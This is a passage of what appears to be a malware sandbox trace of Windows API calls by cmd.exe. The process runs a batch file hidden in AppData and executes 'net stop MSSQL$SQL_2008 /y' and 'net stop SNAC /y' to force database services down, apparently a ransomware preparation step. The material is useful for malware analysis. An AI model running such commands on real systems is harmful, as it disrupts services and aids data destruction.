(_String1="net", _String2="VERIFY") returned -8 [0216.065] _wcsicmp (_String1="net", _String2="VER") returned -8 [0216.065] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0216.065] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0216.065] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0216.065] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0216.065] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0216.065] _wcsicmp (_String1="net", _String2="START") returned -5 [0216.065] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0216.065] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0216.065] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0216.065] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0216.065] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0216.065] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0216.065] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0216.065] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0216.065] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0216.065] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0216.066] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0216.066] SetErrorMode (uMode=0x0) returned 0x1 [0216.066] GetProcessHeap () returned 0x3e0000 [0216.066] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0216.066] GetProcessHeap () returned 0x3e0000 [0216.066] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0216.066] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0216.066] GetProcessHeap () returned 0x3e0000 [0216.066] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0216.067] GetProcessHeap () returned 0x3e0000 [0216.067] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0216.067] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0216.067] GetProcessHeap () returned 0x3e0000 [0216.067] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0216.067] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.067] GetProcessHeap () returned 0x3e0000 [0216.067] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0216.067] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0216.067] GetProcessHeap () returned 0x3e0000 [0216.067] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0216.068] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.068] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0216.068] GetLastError () returned 0x2 [0216.069] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0216.069] GetLastError () returned 0x2 [0216.069] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.070] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0216.070] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0216.070] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0216.070] GetLastError () returned 0x2 [0216.071] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0216.071] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0216.071] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.072] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0216.072] SetErrorMode (uMode=0x0) returned 0x1 [0216.072] GetProcessHeap () returned 0x3e0000 [0216.072] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0216.072] GetProcessHeap () returned 0x3e0000 [0216.072] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0216.072] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0216.072] GetProcessHeap () returned 0x3e0000 [0216.072] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0216.072] GetProcessHeap () returned 0x3e0000 [0216.072] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0216.073] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0216.073] GetProcessHeap () returned 0x3e0000 [0216.073] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0216.073] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.073] GetProcessHeap () returned 0x3e0000 [0216.073] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0216.073] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0216.073] GetProcessHeap () returned 0x3e0000 [0216.073] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0216.074] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.074] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0216.074] GetLastError () returned 0x2 [0216.075] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0216.075] GetLastError () returned 0x2 [0216.075] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.075] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0216.076] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0216.076] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0216.076] GetLastError () returned 0x2 [0216.076] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0216.077] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0216.077] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.077] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0216.077] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0216.077] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0216.078] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0216.078] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQL$SQL_2008 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQL$SQL_2008 /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQL$SQL_2008 /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x570, dwThreadId=0xbd4)) returned 1 [0216.082] CloseHandle (hObject=0x78) returned 1 [0216.082] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0216.082] GetProcessHeap () returned 0x3e0000 [0216.082] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0216.082] GetEnvironmentStringsW () returned 0x3f8408* [0216.082] GetProcessHeap () returned 0x3e0000 [0216.082] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0216.082] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0216.082] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0216.217] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0216.217] CloseHandle (hObject=0x74) returned 1 [0216.217] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0216.217] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0216.217] GetProcessHeap () returned 0x3e0000 [0216.217] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0216.217] GetEnvironmentStringsW () returned 0x3f8408* [0216.217] GetProcessHeap () returned 0x3e0000 [0216.217] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0216.218] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0216.218] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0216.218] GetProcessHeap () returned 0x3e0000 [0216.218] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0216.218] GetEnvironmentStringsW () returned 0x3f8408* [0216.218] GetProcessHeap () returned 0x3e0000 [0216.218] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0216.218] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0216.218] GetProcessHeap () returned 0x3e0000 [0216.218] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0216.218] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0216.218] _get_osfhandle (_FileHandle=1) returned 0x264 [0216.218] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0216.218] _get_osfhandle (_FileHandle=1) returned 0x264 [0216.218] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0216.219] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0216.219] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0216.219] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0216.219] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0216.219] SetConsoleInputExeNameW () returned 0x1 [0216.219] GetConsoleOutputCP () returned 0x1b5 [0216.219] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0216.219] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.219] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0216.220] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0216.220] _get_osfhandle (_FileHandle=3) returned 0x74 [0216.220] SetFilePointer (in: hFile=0x74, lDistanceToMove=5742, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x166e [0216.220] GetProcessHeap () returned 0x3e0000 [0216.220] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0216.220] GetProcessHeap () returned 0x3e0000 [0216.220] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0216.220] GetProcessHeap () returned 0x3e0000 [0216.220] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0216.220] GetProcessHeap () returned 0x3e0000 [0216.220] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0216.220] GetProcessHeap () returned 0x3e0000 [0216.220] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0216.220] GetProcessHeap () returned 0x3e0000 [0216.220] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0216.220] GetProcessHeap () returned 0x3e0000 [0216.220] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0216.220] GetProcessHeap () returned 0x3e0000 [0216.220] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0216.220] GetProcessHeap () returned 0x3e0000 [0216.220] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0216.220] GetProcessHeap () returned 0x3e0000 [0216.220] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0216.220] GetProcessHeap () returned 0x3e0000 [0216.220] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0216.220] GetProcessHeap () returned 0x3e0000 [0216.220] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0216.220] GetProcessHeap () returned 0x3e0000 [0216.220] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0216.221] _get_osfhandle (_FileHandle=3) returned 0x74 [0216.221] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x166e [0216.221] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x253, lpOverlapped=0x0) returned 1 [0216.221] SetFilePointer (in: hFile=0x74, lDistanceToMove=5760, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1680 [0216.221] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=18, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SNAC /y\r\n_2008 /y\r\n\r\n\n/y\r\n/y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 18 [0216.221] _get_osfhandle (_FileHandle=3) returned 0x74 [0216.221] GetFileType (hFile=0x74) returned 0x1 [0216.221] _get_osfhandle (_FileHandle=3) returned 0x74 [0216.221] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1680 [0216.221] GetProcessHeap () returned 0x3e0000 [0216.221] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0216.221] GetProcessHeap () returned 0x3e0000 [0216.221] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0216.225] _tell (_FileHandle=3) returned 5760 [0216.225] _close (_FileHandle=3) returned 0 [0216.225] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0216.225] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0216.225] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0216.225] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0216.225] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0216.225] _wcsicmp (_String1="net", _String2="CD") returned 11 [0216.225] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0216.225] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0216.225] _wcsicmp (_String1="net", _String2="REN") returned -4 [0216.225] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0216.225] _wcsicmp (_String1="net", _String2="SET") returned -5 [0216.226] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0216.226] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0216.226] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0216.226] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0216.226] _wcsicmp (_String1="net", _String2="MD") returned 1 [0216.226] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0216.226] _wcsicmp (_String1="net", _String2="RD") returned -4 [0216.226] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0216.226] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0216.226] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0216.226] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0216.226] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0216.226] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0216.226] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0216.226] _wcsicmp (_String1="net", _String2="VER") returned -8 [0216.226] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0216.226] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0216.226] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0216.226] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0216.226] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0216.226] _wcsicmp (_String1="net", _String2="START") returned -5 [0216.226] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0216.226] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0216.226] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0216.226] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0216.226] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0216.226] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0216.226] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0216.226] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0216.226] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0216.226] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0216.227] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0216.227] SetErrorMode (uMode=0x0) returned 0x1 [0216.227] GetProcessHeap () returned 0x3e0000 [0216.227] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0216.227] GetProcessHeap () returned 0x3e0000 [0216.227] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0216.227] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0216.227] GetProcessHeap () returned 0x3e0000 [0216.227] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0216.227] GetProcessHeap () returned 0x3e0000 [0216.227] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0216.228] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0216.228] GetProcessHeap () returned 0x3e0000 [0216.228] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0216.228] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.228] GetProcessHeap () returned 0x3e0000 [0216.228] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0216.228] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0216.228] GetProcessHeap () returned 0x3e0000 [0216.228] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0216.229] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.229] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0216.229] GetLastError () returned 0x2 [0216.230] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0216.230] GetLastError () returned 0x2 [0216.230] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.230] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0216.231] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0216.231] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0216.231] GetLastError () returned 0x2 [0216.231] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0216.232] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0216.232] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.232] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0216.233] SetErrorMode (uMode=0x0) returned 0x1 [0216.233] GetProcessHeap () returned 0x3e0000 [0216.233] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0216.233] GetProcessHeap () returned 0x3e0000 [0216.233] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0216.233] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0216.233] GetProcessHeap () returned 0x3e0000 [0216.233] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0216.233] GetProcessHeap () returned 0x3e0000 [0216.233] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0216.233] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0216.234] GetProcessHeap () returned 0x3e0000 [0216.234] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0216.234] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.234] GetProcessHeap () returned 0x3e0000 [0216.234] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0216.234] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0216.234] GetProcessHeap () returned 0x3e0000 [0216.234] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0216.235] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.235] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, 